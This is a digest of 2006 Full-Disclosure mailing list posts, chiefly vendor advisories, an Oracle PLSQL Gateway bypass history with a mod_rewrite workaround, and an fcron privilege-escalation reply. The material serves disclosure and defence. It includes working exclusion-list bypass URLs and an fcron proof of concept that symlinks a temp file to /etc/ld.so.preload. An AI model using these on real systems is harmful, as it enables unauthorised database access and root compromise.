[Full-disclosure] about uncovering skype

2006-02-02 Thread Wu Ping

I have similar confusion about the paper. The TCP packet detection part cannot
be reproduced either. It does not mention what the seed means: is that the RC4
key, or does the RC4 key need to be generated from it? And it did not point out
how to get the first 10 cleartext bytes of the first packet. Also, it points out
that the first 2 packets are not ciphered using RC4.

Has anyone figured out how to decipher the first 2 packets?



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CAID 33581 - CA Message Queuing Denial of Service Vulnerabilities

2006-02-02 Thread Williams, James K

Title: CAID 33581 - CA Message Queuing Denial of Service Vulnerabilities

CA Vulnerability ID: 33581

CA Advisory Date: 2006-02-02

Discovered By: Nicolas Pouvesle of Tenable Network Security


Impact: Remote attacker can cause a denial of service condition.


Summary: The following two security vulnerability issues have been 
identified in the CA Message Queuing (CAM / CAFT) software:
1) CAM is vulnerable to a Denial of Service (DoS) attack when a 
specially crafted message is received on TCP port 4105.
2) CAM is vulnerable to a Denial of Service (DoS) through the 
spoofing of CAM control messages.


Mitigating Factors: None.


Severity: CA has given these vulnerabilities a Medium risk rating.


Affected Technologies: Please note that the CA Message Queuing 
(CAM / CAFT) software is not a product, but rather a common 
component that is included with multiple products.  All versions 
of the CA Message Queuing software prior to v1.07 Build 220_16 and 
v1.11 Build 29_20 on the specified platforms are affected.  The CA 
Message Queuing software is included in the following CA products, 
which are consequently potentially vulnerable.


Affected Products:

Advantage Data Transport 3.0
BrightStor SAN Manager 1.1, 1.1 SP1, 1.1 SP2, 11.1
BrightStor Portal 11.1
CleverPath OLAP 5.1
CleverPath ECM 3.5
CleverPath Predictive Analysis Server 2.0, 3.0
CleverPath Aion 10.0
eTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1
Unicenter Application Performance Monitor 3.0, 3.5
Unicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, 
4.0 SP1
Unicenter Data Transport Option 2.0
Unicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2
Unicenter Jasmine 3.0
Unicenter Management for WebSphere MQ 3.5
Unicenter Management for Microsoft Exchange 4.0, 4.1
Unicenter Management for Lotus Notes/Domino 4.0
Unicenter Management for Web Servers 5, 5.0.1
Unicenter NSM 3.0, 3.1
Unicenter NSM Wireless Network Management Option 3.0
Unicenter Remote Control 6.0, 6.0 SP1
Unicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5
Unicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, 
4.0 SP1
Unicenter TNG 2.1, 2.2, 2.4, 2.4.2
Unicenter TNG JPN 2.2


Affected platforms:
AIX, DG Intel, DG Motorola, DYNIX, OSF1, HP-UX, IRIX, Linux Intel, 
Linux s/390, Solaris Intel, Solaris Sparc, UnixWare and Windows.


Platforms NOT affected:
AS/400, MVS, NetWare, OS/2 and OpenVMS.


Status and Recommendation: 
(note that URLs below may wrap)
CA strongly recommends the application of the appropriate patch 
listed below.
CAM v1.11 prior to Build 29_20
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam111fixes.asp
CAM v1.07 prior to Build 220_16
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam107fixes.asp
CAM v1.05 (any version)
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_cam107fixes.asp

Customers wishing to patch their Master Image CD sets should refer 
to the solution areas on the product home pages.
http://supportconnectw.ca.com/main.asp

Frequently Asked Questions (FAQ) related to this security update
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_FAQ.asp

For USD/SDO Packages and UAM/AMO Definitions information, please 
refer to the SupportConnect Security Notice and FAQ.
CA Message Queuing Security Notice
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_notice.asp


Determining CAM versions:

Simply running camstat will return the version information in the 
top line of the output on any platform. The camstat command is 
located in the bin subfolder of the installation directory.

The example below indicates that CAM version 1.11 build 27 
increment 2 is running.

E:\>camstat
CAM - machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16

Determining the CAM install directory:

Windows: the install location is specified by the %CAI_MSQ% 
environment variable
Unix/Linux/Mac: the /etc/catngcampath text file holds the CAM 
install location 


References: 
(note that URLs may wrap)
CA SupportConnect:
http://supportconnect.ca.com/
CA Message Queuing Security Notice
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_notice.asp
CAM / CAFT Security Notice Frequently Asked Questions
http://supportconnectw.ca.com/public/ca_common_docs/camessagsecurity_FAQ.asp

CAID: 33581
CAID Advisory link: 
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33581

CVE Reference: Pending
http://cve.mitre.org/

OSVDB Reference: 
OSVDB-21146 http://osvdb.org/21146
OSVDB-21147 http://osvdb.org/21147


Changelog:
v1.0 - Initial Release


Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to [EMAIL PROTECTED], or utilize our Submit a 
Vulnerability form.
URL: 
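The advisory's "Determining CAM versions" section tells administrators to read the first line of camstat output and compare it with the fixed builds. The script below is an added example, not CA's tooling: it parses the camstat line quoted in the advisory and checks it against the fixed builds the advisory names (1.07 Build 220_16 and 1.11 Build 29_20; any 1.05 is treated as affected, as the advisory directs 1.05 users to the 1.07 fixes). Running camstat itself is assumed to be done separately and its first line pasted in; the sample line is the advisory's own example.

```python
import re

# Minimum fixed builds named in the advisory, keyed by CAM version line:
# (build, increment) as they appear in "Build 29_20".
FIXED_BUILDS = {
    "1.07": (220, 16),
    "1.11": (29, 20),
}

# First line of camstat output, copied from the advisory's example.
SAMPLE_CAMSTAT = "CAM - machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16"

_LINE_RE = re.compile(r"Version\s+(\d+\.\d+)\s+\(Build\s+(\d+)_(\d+)\)")


def parse_camstat(first_line):
    """Return (version, build, increment) from camstat's first output line."""
    m = _LINE_RE.search(first_line)
    if not m:
        raise ValueError("unrecognised camstat output: %r" % first_line)
    return m.group(1), int(m.group(2)), int(m.group(3))


def is_patched(version, build, increment):
    """True only when this CAM is at or above the fixed build for its version line.

    1.05 has no fixed build of its own and is always reported as affected.
    A version line the advisory does not list is reported as affected so that
    it gets looked at by hand rather than silently passing.
    """
    if version == "1.05":
        return False
    fixed = FIXED_BUILDS.get(version)
    if fixed is None:
        return False
    return (build, increment) >= fixed


def assess(first_line):
    """Human-readable verdict for one camstat line."""
    version, build, inc = parse_camstat(first_line)
    status = "patched" if is_patched(version, build, inc) else "AFFECTED"
    return "CAM %s build %d_%d: %s" % (version, build, inc, status)


if __name__ == "__main__":
    # The advisory's own sample (1.11 build 27_2) is below the 29_20 fix.
    print(assess(SAMPLE_CAMSTAT))
```

On a fleet, the same check can be fed the first line of `camstat` from each host (the binary lives in the bin subfolder under %CAI_MSQ% on Windows or the directory named in /etc/catngcampath on Unix, per the advisory).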

[Full-disclosure] The History of the Oracle PLSQL Gateway Flaw

2006-02-02 Thread David Litchfield

In the past few days Oracle has criticized me for publishing a workaround
for a critical flaw in their PLSQL Gateway. This email will show that after
4 years of waiting for Oracle to try to get it right, I eventually decided
to take matters into my own hands and provide Oracle customers with more
help than Oracle is currently doing. Oracle - shame on you:



The Oracle PLSQL Gateway sits on a web server and allows web users to
execute PLSQL applications in an Oracle database server. When first
introduced, as long as a web user had the permission to execute the PLSQL
procedure and knew its name then they could execute it through the PLSQL
gateway. This clearly opens up a massive security risk and Oracle introduced
what is known as the PLSQLExclusionList to help limit exposure. Essentially,
if a web user attempts to access any plsql package listed in the exclusion
list then the Gateway rejects the user's request with a forbidden message.
So access to anything that started with SYS., for example, would be
blocked.

Or that's what's supposed to happen, anyway. There are two distinct problems
with this solution. Firstly, it's never worked and the exclusion list can be
totally bypassed and secondly, it's a half baked idea to begin with. Let's
delve deeper and examine both of these.

When Oracle first introduced the exclusion list in 2001 it could be
trivially bypassed by preceding the plsql package name with a newline
character:

http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROCEDURE

I advised Oracle about this bypass problem in 2001 and, once Oracle
patched this, I published details in Hackproofing Oracle Application
Server (http://www.ngssoftware.com/papers/hpoas.pdf).

It didn't take long to discover that this patch could be bypassed using the
following technique: due to internationalization, an Oracle database server
will convert the ÿ character (value 0xFF) to a capital Y. The PLSQL Gateway
will not. Thus, if we request

http://www.example.com/pls/dad/S%FFS.PACKAGE.PROCEDURE

the gateway will happily pass it over to the database server where the ÿ is
converted to a Y and we can gain access again.

Oracle issued a patch for this but this patch was broken, too. What's
interesting is the story behind how I found the next bypass technique. I had
just reported some flaws in a few PLSQL applications in the database server
but there was only a risk if an attacker could bypass the exclusion list. As
Oracle had just released a fix for the bypass problem they stated they
were not going to fix the backend flaws. This is from the email they sent me
informing me that they weren't going to fix these issues:

We feel that our latest fix to security alert #68 will now correctly block
any request that matches the patterns defined in the exclusion list. The
OWA_OPT_LOCK package falls under the OWA_* pattern. Therefore, this request
will be blocked by the exclusion list feature. Since the exclusion list
cannot be bypassed anymore, we are not allowing anyone to call this package
from the browser, and thereby, blocking this PL/SQL injection from
happening.

This angered me as it was clear laziness on Oracle's part and they were
deliberately leaving their customers at risk. I then set out to find a new
bypass technique and eleven minutes after reading this mail I found what I
was looking for. This new bypass technique simply involved enquoting -
putting SYS in double quotes:

http://www.example.com/pls/dad/"SYS".PACKAGE.PROCEDURE

Whilst this bypass worked on Oracle Application Server 9 - it didn't on 10g.
The technical reason for this is as follows. 10g App Server converts the
upper case SYS to the lower case sys - and if something is enquoted - it
needs to match the right case. However, a bypass trick that did work with
10g was to use angle brackets - these form a label in PLSQL.

http://www.example.com/pls/dad/<<LABEL>>SYS.PACKAGE.PROCEDURE


So come July 2005 Oracle had really made a mess of all this and introduced
their next patch. This can be bypassed too - this is the one I posted a
workaround for and we're all currently waiting on Oracle fixing.


Going back to the second problem - that is - the PLSQL Exclusion List is a
half baked idea to begin with. The exclusion list, by default, attempts to
block access to the following:

SYS.*
DBMS_*
UTL_*
OWA_*
OWA.*
HTP.*
HTF.*

Thus, by default, access to packages owned by accounts such as CTXSYS or
MDSYS is not blocked. These two accounts are both DBAs and, what's more,
many of the PLSQL applications owned by these accounts have suffered from
security flaws. As the exclusion list doesn't block access to these
accounts, these flaws can be exploited via the web server to gain complete
control of the database server. The point is the exclusion list is a black
list solution and the problem with black lists is that you need to know in
advance everything that is bad and should be black listed. It's a much
easier proposition to know what is not bad though and only allow access to
this. This is 

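The post's closing argument is that a black list fails whenever the checker and the backend disagree about what a name means, while an allow list of known-good procedures has no such gap. The following is an added example, not Oracle's code or the author's: a simplified model in which the "gateway" matches the decoded request against the default exclusion list quoted above, and a "database" function applies the normalisations the post describes (leading newline ignored, 0xFF folded to Y, a quoted identifier unquoted as on Application Server 9, a <<label>> prefix dropped). The allow-listed procedure names, and the CTXSYS package/procedure names, are hypothetical placeholders.

```python
import fnmatch
import re
import urllib.parse

# Default exclusion list, as quoted in the post.
EXCLUSION_LIST = ["SYS.*", "DBMS_*", "UTL_*", "OWA_*", "OWA.*", "HTP.*", "HTF.*"]

# Hypothetical application entry points an allow-list gateway would permit.
ALLOWED_PROCEDURES = {"APP.REPORTS.SHOW", "APP.REPORTS.LIST"}


def decode_segment(raw_segment):
    """URL-decode the text after /pls/dad/ (latin-1, so %FF becomes the single character U+00FF)."""
    return urllib.parse.unquote(raw_segment, encoding="latin-1")


def gateway_blacklist_blocks(decoded):
    """Model of the exclusion-list check: the decoded name is matched,
    case-insensitively, against the wildcard patterns with no canonicalisation first."""
    name = decoded.upper()
    return any(fnmatch.fnmatchcase(name, pat) for pat in EXCLUSION_LIST)


def database_canonical_name(decoded):
    """Simplified model of the server-side normalisations the post describes."""
    s = decoded.lstrip("\r\n\t ")          # leading newline is not part of the name
    s = s.replace("\u00ff", "Y")           # 0xFF folded to a capital Y
    s = re.sub(r"^<<[^>]*>>", "", s)       # <<LABEL>> is a PL/SQL label, not a name
    s = s.replace('"', "")                 # quoted identifier unquoted (App Server 9 case)
    return s.upper()


def blacklist_outcome(raw_segment):
    """(blocked_at_gateway, name_the_database_would_run_or_None)."""
    decoded = decode_segment(raw_segment)
    if gateway_blacklist_blocks(decoded):
        return True, None
    return False, database_canonical_name(decoded)


def allowlist_outcome(raw_segment):
    """An allow list compares the decoded request with exact known-good names.
    A spelling that is not literally on the list is refused, so how the
    database would later canonicalise it never comes into play."""
    decoded = decode_segment(raw_segment).upper()
    if decoded in ALLOWED_PROCEDURES:
        return False, decoded
    return True, None


# The spellings discussed in the post, plus a package under a DBA-owned schema
# the default list never covered (hypothetical package/procedure names).
REQUESTS = [
    "SYS.PACKAGE.PROCEDURE",
    "%0ASYS.PACKAGE.PROCEDURE",
    "S%FFS.PACKAGE.PROCEDURE",
    '"SYS".PACKAGE.PROCEDURE',
    "<<LABEL>>SYS.PACKAGE.PROCEDURE",
    "CTXSYS.SOME_PACKAGE.SOME_PROC",
    "app.reports.show",
]

if __name__ == "__main__":
    for r in REQUESTS:
        print("%-34s blacklist=%-32s allowlist=%s"
              % (r, blacklist_outcome(r), allowlist_outcome(r)))
```

Only the literal `SYS.PACKAGE.PROCEDURE` is stopped by the black list; every other spelling reaches the model database as exactly that name. The allow list refuses all of them, including the CTXSYS request that the default exclusion list never covered, because its decision does not depend on reproducing the backend's parser.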
[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw

2006-02-02 Thread David Litchfield
According to Oracle, the workaround I posted, that prevents exploitation of 
a critical vulnerability that Oracle has so far failed to fix, breaks 
certain applications that sit atop their PLSQL Gateway. Though my 
workaround prevents exploitation of the critical flaw and thus protects 
vulnerable systems against attack, Oracle has made no effort to furnish me, 
or anyone else for that matter, with more information on how the workaround 
breaks some of their applications. As such, improving the workaround so it 
doesn't break these few applications has been mildly annoying. But I think 
I've tracked it down. The workaround as is:


RewriteEngine  on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

will trigger if a right facing bracket ')' appears in the PATH_INFO or 
_anywhere_ in the query string. Thus, if the value of a query string 
parameter contains a bracket the workaround will trigger. As far as the flaw 
is concerned, we need only concern ourselves with brackets that appear in 
the query string parameter name - not in the value for the parameter name. 
As such, if we modify the workaround to


RewriteEngine  on
RewriteCond %{QUERY_STRING} ^.*\).*=|.*%29.*=$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

we can prevent exploitation if the query string parameter name has a bracket 
whilst still allowing brackets in the parameter value. This can be tidied up 
to read:


RewriteEngine  on
RewriteCond %{QUERY_STRING} \).*=|%29.*=
RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack
RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack

# Thanks, Mike Pomraning!

For those that haven't been able to adopt the workaround because it would 
break their specific application, the modified workaround should work 
in your situation.


Cheers,
David Litchfield



Re: [Full-disclosure] Fcrontab - memory corruption on heap.

2006-02-02 Thread Karol Wiesek
On Wed, Feb 01, 2006 at 03:28:50PM +0100, Adam Zabrocki wrote:
= Name:  Fcron - convert-fcrontab
= Vendor URL:http://fcron.free.fr
= Author:Adam Zabrocki [EMAIL PROTECTED]
= Date:  November 25, 2005
= 
= 
= 
= 
= Issue:
= 
=  Fcron (convert-fcrontab) allow users to corruption on heap section.

Hi pi3 and list,

There are much simpler bugs in convert-fcrontab, which together allow 
gaining uid0 privileges. 

* convert-fcrontab lacks any checks on the file path passed to it. An attacker could 
get outside the fcron spool directory using ../.

* convert-fcrontab opens temporary file without O_EXCL flag.

PoC:

perl -e '{print "fcrontab-017\nuser\x001132863099\n\x00\x00\x00\x00"}' > /tmp/fc_file
ln -s /etc/ld.so.preload /tmp/fc_file.tmp
convert-fcrontab ../../../../tmp/fc_file 

This will create an empty /etc/ld.so.preload file or truncate an existing one.

Tested on fcron 2.9.5 shipped with trustix 2.2 (setuid root by default), and 
fcron 3.0.0.

regards Karol


[Full-disclosure] [ MDKSA-2006:029 ] - Updated libast packages fixes buffer overflow vulnerability

2006-02-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:029
 http://www.mandriva.com/security/
 ___
 
 Package : libast
 Date: February 2, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Buffer overflow in Library of Assorted Spiffy Things (LibAST) 0.6.1
 and earlier, as used in Eterm and possibly other software, allows
 local users to execute arbitrary code as the utmp user via a long -X
 argument.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0224
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 bf46177b085a67b202f18b755e34ce60  
2006.0/RPMS/libast2-0.6.1-2.1.20060mdk.i586.rpm
 16fb69d856d3e877606e8551c359f80c  
2006.0/RPMS/libast2-devel-0.6.1-2.1.20060mdk.i586.rpm
 cc286e5022b221bc91179ac18e39f22b  
2006.0/SRPMS/libast-0.6.1-2.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 63ecae854470eed332836e1ccd231fd0  
x86_64/2006.0/RPMS/lib64ast2-0.6.1-2.1.20060mdk.x86_64.rpm
 03cba4d84d22a70711e096bab7db33f4  
x86_64/2006.0/RPMS/lib64ast2-devel-0.6.1-2.1.20060mdk.x86_64.rpm
 cc286e5022b221bc91179ac18e39f22b  
x86_64/2006.0/SRPMS/libast-0.6.1-2.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFD4kE/mqjQ0CJFipgRAswwAKC0q1rtT6YbTuceCNFEHcIpYe9KaACfTGX6
2iCJNCx1Nxu8aijjqZICElM=
=i551
-END PGP SIGNATURE-



[Full-disclosure] [ MDKSA-2006:031 ] - Updated kdegraphics packages fixes heap-based buffer overflow vulnerability

2006-02-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:031
 http://www.mandriva.com/security/
 ___
 
 Package : kdegraphics
 Date: February 2, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Heap-based buffer overflow in Splash.cc in xpdf allows attackers to
 cause a denial of service and possibly execute arbitrary code via
 crafted splash images that produce certain values that exceed the width
 or height of the associated bitmap.
 
 Kdegraphics-kpdf uses a copy of the xpdf code and as such has the same
 issues.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0301
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 05cc9d9192609e6947a23751b6fb21b1  
2006.0/RPMS/kdegraphics-3.4.2-11.5.20060mdk.i586.rpm
 708cbdb3e41c7108db265490e5779cd3  
2006.0/RPMS/kdegraphics-common-3.4.2-11.5.20060mdk.i586.rpm
 6c96fdbb9db6927eba1c1fe6f4f5cf12  
2006.0/RPMS/kdegraphics-kdvi-3.4.2-11.5.20060mdk.i586.rpm
 d04355d153efa6c3274c106ffdb23776  
2006.0/RPMS/kdegraphics-kfax-3.4.2-11.5.20060mdk.i586.rpm
 377ab151f92b3ef1d02dd280010491b2  
2006.0/RPMS/kdegraphics-kghostview-3.4.2-11.5.20060mdk.i586.rpm
 db0ba637603ff299b83b789db9acf98f  
2006.0/RPMS/kdegraphics-kiconedit-3.4.2-11.5.20060mdk.i586.rpm
 314122999fcee0d62e79db850fe0876c  
2006.0/RPMS/kdegraphics-kolourpaint-3.4.2-11.5.20060mdk.i586.rpm
 bad7784d58903a1d7d76aa9b3ae56345  
2006.0/RPMS/kdegraphics-kooka-3.4.2-11.5.20060mdk.i586.rpm
 e530e96917b2296cfb289f5123a042ac  
2006.0/RPMS/kdegraphics-kpaint-3.4.2-11.5.20060mdk.i586.rpm
 3adf08e61864ebf9b1da4916bf4aa5b3  
2006.0/RPMS/kdegraphics-kpdf-3.4.2-11.5.20060mdk.i586.rpm
 92a9d22e62ca1dc95b16ba5b192881f6  
2006.0/RPMS/kdegraphics-kpovmodeler-3.4.2-11.5.20060mdk.i586.rpm
 6dfe5233ca18b1c1780505c203e0bb7e  
2006.0/RPMS/kdegraphics-kruler-3.4.2-11.5.20060mdk.i586.rpm
 926a91082443f7cf04adcf3126be09ab  
2006.0/RPMS/kdegraphics-ksnapshot-3.4.2-11.5.20060mdk.i586.rpm
 e502164d57e4e28cdf5f6bf7ddfd3fea  
2006.0/RPMS/kdegraphics-ksvg-3.4.2-11.5.20060mdk.i586.rpm
 f6274a326d1234b5cdbbe6ea6ee5074e  
2006.0/RPMS/kdegraphics-kuickshow-3.4.2-11.5.20060mdk.i586.rpm
 b627c6d89626522c7ac0b1db1aff60d5  
2006.0/RPMS/kdegraphics-kview-3.4.2-11.5.20060mdk.i586.rpm
 51f6043b09660216cf3b58183ae4c0e9  
2006.0/RPMS/kdegraphics-mrmlsearch-3.4.2-11.5.20060mdk.i586.rpm
 c729f766472b88783c1e7ed01c278102  
2006.0/RPMS/libkdegraphics0-common-3.4.2-11.5.20060mdk.i586.rpm
 31cb7fb149f7b5c9ef8d72864daa8862  
2006.0/RPMS/libkdegraphics0-common-devel-3.4.2-11.5.20060mdk.i586.rpm
 386c0569e197451fea5a4e397dfacec4  
2006.0/RPMS/libkdegraphics0-kghostview-3.4.2-11.5.20060mdk.i586.rpm
 3c4d500b7bcd7d100e50f1076feca5c6  
2006.0/RPMS/libkdegraphics0-kghostview-devel-3.4.2-11.5.20060mdk.i586.rpm
 6d4bea12f029996bfcfded04875479c3  
2006.0/RPMS/libkdegraphics0-kooka-3.4.2-11.5.20060mdk.i586.rpm
 04eb92287e1d099f8aac20796b55a22b  
2006.0/RPMS/libkdegraphics0-kooka-devel-3.4.2-11.5.20060mdk.i586.rpm
 838aacb3a057a7f5a6d7d8cc11458761  
2006.0/RPMS/libkdegraphics0-kpovmodeler-3.4.2-11.5.20060mdk.i586.rpm
 acf180efd104a8296558223d6eb8d863  
2006.0/RPMS/libkdegraphics0-kpovmodeler-devel-3.4.2-11.5.20060mdk.i586.rpm
 7b05741f85f1e3136435e8beb0507019  
2006.0/RPMS/libkdegraphics0-ksvg-3.4.2-11.5.20060mdk.i586.rpm
 6b9fed5002103f7a5b5a7018f0334cee  
2006.0/RPMS/libkdegraphics0-ksvg-devel-3.4.2-11.5.20060mdk.i586.rpm
 c0c2f0e7110b22b38bb5c3b84c860f09  
2006.0/RPMS/libkdegraphics0-kuickshow-3.4.2-11.5.20060mdk.i586.rpm
 d90c7ff03a87f7c8df35f9005671d16b  
2006.0/RPMS/libkdegraphics0-kview-3.4.2-11.5.20060mdk.i586.rpm
 7f09c2c76e06d81090c4a646fa602b4a  
2006.0/RPMS/libkdegraphics0-kview-devel-3.4.2-11.5.20060mdk.i586.rpm
 24762cf35a4cb099b04da82ed33d746f  
2006.0/RPMS/libkdegraphics0-mrmlsearch-3.4.2-11.5.20060mdk.i586.rpm
 1a2d59d9479691a3ccc608e37fa26e04  
2006.0/SRPMS/kdegraphics-3.4.2-11.5.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 c369e1bd017e812362140e73ad38cf62  
x86_64/2006.0/RPMS/kdegraphics-3.4.2-11.5.20060mdk.x86_64.rpm
 0716ba07a943676453db8eb61dd392f4  
x86_64/2006.0/RPMS/kdegraphics-common-3.4.2-11.5.20060mdk.x86_64.rpm
 160a394b89558f0b09585748c868472b  
x86_64/2006.0/RPMS/kdegraphics-kdvi-3.4.2-11.5.20060mdk.x86_64.rpm
 736c45f562adfcc7136e33e945b29be5  
x86_64/2006.0/RPMS/kdegraphics-kfax-3.4.2-11.5.20060mdk.x86_64.rpm
 a5bc85d02768c18ddeb0c147c4677d15  
x86_64/2006.0/RPMS/kdegraphics-kghostview-3.4.2-11.5.20060mdk.x86_64.rpm
 2b90ae6915d37dc13362ef33b0915cb1  
x86_64/2006.0/RPMS/kdegraphics-kiconedit-3.4.2-11.5.20060mdk.x86_64.rpm
 

[Full-disclosure] Flaw in rpcbind

2006-02-02 Thread Anil Kumar
Hi,

There is a flaw in rpcbind when there is translation from a transport-specific (local) address to a transport-independent (universal) address? I think there is some problem. Has anybody come across this issue?

-- Anil K. Chaudhary

[Full-disclosure] [ MDKSA-2006:032 ] - Updated xpdf packages fixes heap-based buffer overflow vulnerability

2006-02-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:032
 http://www.mandriva.com/security/
 ___
 
 Package : xpdf
 Date: February 2, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Heap-based buffer overflow in Splash.cc in xpdf allows attackers to
 cause a denial of service and possibly execute arbitrary code via
 crafted splash images that produce certain values that exceed the width
 or height of the associated bitmap.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0301
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 21b6cae8bc6307f990b3358019d9b618  2006.0/RPMS/xpdf-3.01-1.2.20060mdk.i586.rpm
 bb57f993783c281c8eec21627457aa2c  2006.0/SRPMS/xpdf-3.01-1.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 f170257a90c5130f3b363abe9f215ed8  
x86_64/2006.0/RPMS/xpdf-3.01-1.2.20060mdk.x86_64.rpm
 bb57f993783c281c8eec21627457aa2c  
x86_64/2006.0/SRPMS/xpdf-3.01-1.2.20060mdk.src.rpm

 Corporate 3.0:
 cf0b4100d5c0b55b2ce53256226a2b47  
corporate/3.0/RPMS/xpdf-3.00-5.8.C30mdk.i586.rpm
 cee7a22a052ea85fc57388a801188ea3  
corporate/3.0/SRPMS/xpdf-3.00-5.8.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 8fcdf6bd62ac3a8d634c701311cdcf11  
x86_64/corporate/3.0/RPMS/xpdf-3.00-5.8.C30mdk.x86_64.rpm
 cee7a22a052ea85fc57388a801188ea3  
x86_64/corporate/3.0/SRPMS/xpdf-3.00-5.8.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFD4lCUmqjQ0CJFipgRAu4+AKC5gQ8Rg6vov31oG569916kiSWbDwCgy11b
qKSStRcw0r+53RaGGHl8rnk=
=BvNc
-END PGP SIGNATURE-



[Full-disclosure] [ MDKSA-2006:033 ] - Updated OpenOffice.org packages fix issue with disabled hyperlinks

2006-02-02 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:033
 http://www.mandriva.com/security/
 ___
 
 Package : OpenOffice.org
 Date: February 2, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 OpenOffice.org 2.0 and earlier, when hyperlinks has been disabled,
 does not prevent the user from clicking the WWW-browser button in the
 Hyperlink dialog, which makes it easier for attackers to trick the user
 into bypassing intended security settings.
 
 Updated packages are patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4636
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 3dee999dd248d5b405070b078bc33587  
2006.0/RPMS/OpenOffice.org-1.1.5-2.2.20060mdk.i586.rpm
 a6e44f1c5ae79e6bff4f256b5605e1fb  
2006.0/RPMS/OpenOffice.org-l10n-af-1.1.5-2.2.20060mdk.i586.rpm
 907f4f481bf4c12258233b78bb49e1eb  
2006.0/RPMS/OpenOffice.org-l10n-ar-1.1.5-2.2.20060mdk.i586.rpm
 0e90101c2ac6d4b9c289c12b7dd1e248  
2006.0/RPMS/OpenOffice.org-l10n-ca-1.1.5-2.2.20060mdk.i586.rpm
 89049d9f8e0f34074bab49eda6ce0db3  
2006.0/RPMS/OpenOffice.org-l10n-cs-1.1.5-2.2.20060mdk.i586.rpm
 a940d095a539a4e52502c1c1b9bba11e  
2006.0/RPMS/OpenOffice.org-l10n-cy-1.1.5-2.2.20060mdk.i586.rpm
 f860093a6b0eb306f4903eb9f3f181d9  
2006.0/RPMS/OpenOffice.org-l10n-da-1.1.5-2.2.20060mdk.i586.rpm
 6f1992dd7dcf4c4011a087ea61f2cb03  
